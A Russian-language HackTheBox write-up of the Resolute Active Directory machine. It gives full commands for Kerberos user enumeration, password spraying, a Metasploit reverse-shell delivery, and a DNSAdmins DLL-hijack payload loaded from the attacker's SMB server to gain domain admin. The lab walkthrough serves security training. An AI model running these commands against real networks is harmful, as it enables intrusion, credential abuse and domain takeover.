Приветствую!
Продолжаем проходить лаборатории и CTF с сайта HackTheBox! В этой лаборатории мы разберём машину Resolute (Windows - Active Directory).Сегодня мы применим разведку в Active Directory, а так же рассмотрим уязвимость Dll Hijacking! Начинаем)
Данные:
Задача: Скомпрометировать машину на Windows и взять два флага user.txt и root.txtОсновная рабочая машина: Kali Linux 2021.4
IP адрес удаленной машины - 10.10.10.169
IP адрес основной машины - 10.10.14.56
Начальная разведка и сканирование портов:
Для начала мы используем Masscan и пробуем быстро найти все открытые порты:masscan -p1-65535,U:1-65535 10.10.10.169 --rate=500 -e tun0И пока Masscan ведет свою работу, запустим параллельно nmap:
nmap -sC -sV 10.10.10.169Теперь посмотрим результаты выполнения наших сканеров:
Masscan:
Nmap:
Мы видим информацию из служб LDAP’а - домен megabank.local. Добавим его в /etc/hosts:
echo '10.10.10.169 megabank.local' >> /etc/hostsСбор информации о пользователях:
Так как у нас открыт порт 88/tcp - Kerberos, попробуем перебрать пользователей по списку с помощью прекрасной утилиты Kerbrute:Kerbrute - это инструмент для быстрого перебора и перечисления действительных учетных записей Active Directory с помощью предварительной проверки подлинности Kerberos.
./kerbrute userenum -d megabank.local --dc megabank.local /root/Users.txtПараметры:
userenum - указывает на перебор пользователей инструментом
-d - указывает домен
--dc - сам контроллер домена (Здесь мы по умолчанию ставим сам домен)
А вот и все наши пользователи которые нам понадобятся для дальнейшей разведки, теперь давайте отсортируем их имена в один файл, с помощью встроенной утилиты Linux - awk и выведем их в файл:
AWK - C-подобный скриптовый язык построчного разбора и обработки входного потока по заданным шаблонам.
./kerbrute userenum -d megabank.local --dc megabank.local /root/Users.txt | awk '{print $7}'
Уберем домен от имени пользователя и получим наш список.
Далее попробуем применить impacket-GetNPUsers:
impacket-GetNPUsers megabank.local/ -usersfile users.txt
К сожалению никаких результатов( Ну... тогда соберем информацию с Enum4linux:
enum4linux -a megabank.local
И видим что у пользователя marko в его описании написано что пользователь создан, а пароль к нему - Welcome123!
Попробуем перебрать пользователей к этому паролю с помощью CrackMapExec:
crackmapexec smb -u users.txt -p Welcome123! --shares 10.10.10.169
И среди неверных кредов получаем аккаунт melanie:Welcome123!
Теперь зайдем в него с помощью EvilWinRM:
./evil-winrm.rb -i megabank.local -u melanie -p Welcome123!
Иии... получаем флаг юзера!
Повышение привилегий:
Для начала сделаем апгрейд своей оболочки powershell и прокинем на уязвимую машину Web-Delivery с Metasploit:
Код:
msfconsole
msf6 > use exploit/multi/script/web_delivery
msf6 exploit(multi/script/web_delivery) > set LHOST tun0
msf6 exploit(multi/script/web_delivery) > set target PSH
msf6 exploit(multi/script/web_delivery) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > run
И получаем наш Powershell скрипт, теперь засунем его в шелл EvilWInRM'а и получим meterpreter сессию:
А вот и наша meterpreter сессия:
Итак, поищем интересную информацию, а может и пароли в системе, просто полазим по директориям.
В корне я нашёл директорию - PSTranscripts - это папка с сохраненными файлами сеанса powershell или его частями.
Теперь перейдем туда и выведем содержимое сеанса:
И мы видим креды от пользователя ryan - Serv3r4Admin4cc123!
Давайте зайдем в его аккаунт!
Ryan - DNSadmin:
После входа в аккаунт этого пользователя, просмотрим информацию о его доступе в системе:
whoami /all
Мы состоим в группе DnsAdmins, а это значит что мы можем использовать сервис dns в своих целях, таким образом создадим .dll библиотеку и загрузим её в конфиг самого dns!
msfvenom -p windows/x64/exec cmd='net group "domain admins" ryan /add /domain' --platform windows -f dll > dns.dllПолезная нагрузка здесь выполняет команду от системы, поэтому мы добавляем нашего пользователя в группы с повышенным доступом.
Теперь чтобы скачать эту нагрузку в наш dns конфиг будем использовать свой сервер smb на стороне:
smbserver.py -debug SHARE . -ip 10.10.14.56После открытия этого сервера мы выполним команду на шелле от ryan:
dnscmd.exe RESOLUTE /config /serverlevelplugindll \\10.10.14.56\SHARE\dns.dllМы загружаем сам dll с нашего smb сервера, далее нам нужно перезапустить службу dns:
sc.exe stop dnssc.exe start dnsВывод smb-сервера:
Теперь нам остается перезайти под этим пользователем и наблюдать!
Мы администраторы домена!
Всем спасибо за чтение данной статьи! Скоро буду
